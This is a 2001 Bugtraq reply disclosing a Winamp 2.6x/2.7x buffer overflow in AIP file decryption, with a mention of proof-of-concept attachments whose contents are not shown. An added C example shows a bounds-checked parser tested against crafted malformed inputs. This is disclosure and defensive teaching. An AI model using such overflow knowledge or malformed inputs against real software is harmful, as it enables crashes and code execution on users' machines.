[20589] in bugtraq


Re: Winamp 2.6x / 2.7x buffer overflow

daemon@ATHENA.MIT.EDU (ByteRage)
Fri May 11 11:21:33 2001

MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="0-1649760492-989148812=:20818"
Message-ID:  <20010506113332.24736.qmail@web13001.mail.yahoo.com>
Date:         Sun, 6 May 2001 04:33:32 -0700
Reply-To: ByteRage <byterage@YAHOO.COM>
From: ByteRage <byterage@YAHOO.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <5.0.2.1.2.20010503220220.02b1f880@mail.powersource.cx>

--0-1649760492-989148812=:20818
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline


Winamp 2.74 doesn't seem to be affected by the bug
(although I thought it would be), only 2.60 -> 2.73
are affected, the AIP file format is some format
invented by AudioSoft to provide a legal way to get
MP3s from the net. AIP files or AudioSoft parameter
files seem to contain weakly encrypted authentication
information... The buffer overflow occurs right in the
decryption loop, there's no bounds checking there...
When in doubt try out the attached proof of concept
exploit (HACKME.AIP). I don't know whether they fixed
that divide-by-zero bug yet in v2.74
(CRASH-ZEROES.AIP). I also don't know if the AudioSoft
plugin is used by other music software.

greetz,
[ByteRage]
<byterage@yahoo.com> http://elf.box.sk/byterage

--- Tom Laermans <tom.laermans@POWERSOURCE.CX> wrote:
> Hi,
>
> >WINAMP 2.6x / 2.7x BUFFER OVERFLOW
> >
> >AFFECTED SYSTEMS
> >Winamp 2.73 (full)
> >[...]
> >DESCRIPTION
> >
> >Winamp has a buffer overflow condition when parsing
> >*.AIP files. (which are set to be automatically
> >downloaded without user intervention, just like the
> >*.M3U / *.PLS files)
>
> Actually, my copy of WinAmp (v2.74) does absolutely
> nothing with .AIP
> files, nor are they listed anywhere in the "File
> Types" in the selection
> box. What are they supposed to do, anyway? (I've
> never heard of 'em before
> either)
>
> Tom
>
> -------------------------------------------------
> Web: http://www.powersource.cx --- ICQ#: 12120754
> Also check this out:  http://kickme.to/sidewinder
> Need some cheats?? http://www.chaos-cheatbase.com
> Keep Fido&BBS Alive!     http://skynetbbs.dyns.cx
> -------------------------------------------------


--0-1649760492-989148812=:20818
Content-Type: application/x-zip-compressed; name="aip-files.zip"
Content-Transfer-Encoding: base64
Content-Description: aip-files.zip
Content-Disposition: attachment; filename="aip-files.zip"

--0-1649760492-989148812=:20818
Content-Type: application/octet-stream; name="wabof3.c"
Content-Transfer-Encoding: base64
Content-Description: wabof3.c
Content-Disposition: attachment; filename="wabof3.c"
--0-1649760492-989148812=:20818--
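The two defects ByteRage names, a decryption loop with no bounds check and a divide by zero on a file-supplied field, as an added C illustration that is not from the mail, its attachments or the AudioSoft plugin. The file layout, the XOR "cipher", the constants and the sample files below are all constructed for the example; the real AIP format is not described on the page.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* Constructed model of a small "parameter file"; NOT the real AIP layout,
 * only a stand-in for the two defects the mail names:
 *   byte 0: XOR key, byte 1: block size (a divisor), byte 2: payload length, 3..: payload */
#define PAYLOAD_MAX 16
#define HDR_LEN 3
enum { AIP_OK = 0, AIP_TRUNCATED = -1, AIP_TOO_LONG = -2, AIP_ZERO_BLOCK = -3,
       AIP_BAD_PAYLOAD = -4 };
/* Hardened parser. The pattern the mail describes would be the bare loop
 *   for (i = 0; i < f[2]; i++) out[i] = f[HDR_LEN + i] ^ f[0];
 * with the file's own length field as the bound, so f[2] > PAYLOAD_MAX writes
 * past 'out'. Here every file-supplied quantity is validated before it is
 * used as a loop bound, an index or a divisor. */
int parse_checked(const uint8_t *f, size_t flen, uint8_t out[PAYLOAD_MAX],
                  size_t *records) {
    if (flen < HDR_LEN) return AIP_TRUNCATED;
    size_t len = f[2];
    if (len > PAYLOAD_MAX) return AIP_TOO_LONG;       /* the missing bounds check */
    if (flen - HDR_LEN < len) return AIP_TRUNCATED;  /* don't read past the input */
    if (f[1] == 0) return AIP_ZERO_BLOCK;             /* the divide-by-zero case */
    for (size_t i = 0; i < len; i++) out[i] = f[HDR_LEN + i] ^ f[0];
    *records = len / f[1];
    return AIP_OK;
}
/* Constructed sample files: key 0x55, payload is "HACKME!!" XORed with it. */
const uint8_t SAMPLE_GOOD[] = {0x55, 4, 8, 0x1D, 0x14, 0x16, 0x1E, 0x18, 0x10, 0x74, 0x74};
const uint8_t SAMPLE_TOO_LONG[] = {0x55, 4, 200, 0x1D, 0x14};
const uint8_t SAMPLE_ZERO_BLOCK[] = {0x55, 0, 2, 0x1D, 0x14};
const uint8_t SAMPLE_TRUNCATED[] = {0x55, 4, 8, 0x1D, 0x14};
/* Verdict for one file; if 'expect' is given the decrypted payload must match it too. */
int check(const uint8_t *f, size_t flen, const char *expect) {
    uint8_t out[PAYLOAD_MAX]; size_t records;
    int rc = parse_checked(f, flen, out, &records);
    if (rc == AIP_OK && expect && (strlen(expect) != f[2] || memcmp(out, expect, f[2])))
        return AIP_BAD_PAYLOAD;
    return rc;
}
int main(void) {
    printf("good %d, too long %d, zero block %d, truncated %d\n",
           check(SAMPLE_GOOD, sizeof SAMPLE_GOOD, "HACKME!!"),
           check(SAMPLE_TOO_LONG, sizeof SAMPLE_TOO_LONG, NULL),
           check(SAMPLE_ZERO_BLOCK, sizeof SAMPLE_ZERO_BLOCK, NULL),
           check(SAMPLE_TRUNCATED, sizeof SAMPLE_TRUNCATED, NULL));
    return 0;
}
```

The order of the checks matters: the length is compared against the output buffer before it is used as a read bound, and the divisor is tested before the division, so each hostile sample is rejected with its own code instead of reaching the loop.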
